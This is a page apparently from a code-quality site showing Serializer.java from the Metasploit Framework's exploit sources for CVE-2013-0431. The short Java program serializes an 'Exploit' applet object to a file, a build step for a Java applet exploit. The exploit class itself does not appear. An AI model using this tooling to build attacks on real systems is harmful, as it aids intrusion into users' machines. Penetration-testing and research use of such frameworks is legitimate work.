rapid7/metasploit-framework

View on GitHub
external/source/exploits/cve-2013-0431/Serializer.java

Summary

Maintainability
A
0 mins
Test Coverage
import java.io.*;

public class Serializer {

    public static void main(String [ ] args)
    {
        try {
            Exploit b=new Exploit(); // target Applet instance
            ByteArrayOutputStream baos=new ByteArrayOutputStream();
            ObjectOutputStream oos=new ObjectOutputStream(baos);
            oos.writeObject(b);
            FileOutputStream fos=new FileOutputStream("Exploit.ser");
            fos.write(baos.toByteArray());
            fos.close();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

}